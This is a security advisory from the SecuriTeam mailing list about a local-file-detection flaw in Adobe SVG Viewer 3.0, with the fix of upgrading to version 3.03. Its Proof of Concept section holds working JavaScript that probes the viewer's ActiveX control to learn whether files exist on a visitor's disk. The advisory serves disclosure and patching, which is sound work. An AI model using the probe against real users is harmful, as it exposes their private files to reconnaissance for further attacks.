The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Adobe SVG Viewer Local File Detection
------------------------------------------------------------------------
SUMMARY
Scalable Vector Graphics (SVG) is an exciting new XML-based language for
Web graphics from the World Wide Web Consortium (W3C).
<http://www.adobe.com/svg/> Adobe's SVG Viewer has been found to contain a
vulnerability that allows attackers to detect the presence of files on the
remote system.
DETAILS
Vulnerable Systems:
* Adobe SVG Viewer version 3.0
Immune Systems:
* Adobe SVG Viewer version 3.03
Adobe SVG Viewer contains a Safe for Scripting ActiveX control (file
NPSVG3.dll). The control contains a property named 'src'. When 'src' is
set to a file that does exist, the web page will stop loading immediately.
If 'src' is set to a file that does not exist the page will continue to
load (specifically readystate will not hit the complete state). Using this
trick a little bit of JavaScript can be used to determine if local files
exist on a users hard drive. Knowing the existence of files can be a
stepping stone for further attacks.
Proof of Concept:
function load(filename)
{
// http://www.hyperdose.com/exploits/AdobeSVG.html
//foo is reference to SVG ActiveX control, filename is the
filename you're looking for
foo.src = filename;
setTimeout("loading()", 5000);
}
function loading()
{
if (document.readyState != 'complete')
{
alert('File does not exist.');
}
else
{
alert('File exists.');
}
window.location.reload(false);
}
This bug is very similar to Hyperdose's last advisory on
<http://www.securiteam.com/windowsntfocus/5AP0P1FFFG.html> Adobe ActiveX
Allows Local File Discovery. The exploit mechanism for this one though is
more interesting. Be aware of timing based attacks. If you pay attention,
they're out there.
Solution:
Upgrade to version 3.03, details from Adobe found here:
<http://www.adobe.com/svg/viewer/install/mainframed.html>
http://www.adobe.com/svg/viewer/install/mainframed.html.
ADDITIONAL INFORMATION
The information has been provided by <mailto:robfly@hyperdose.com>
Hyperdose Security.
The original article can be found at:
<http://www.hyperdose.com/advisories/H2005-07.txt>
http://www.hyperdose.com/advisories/H2005-07.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
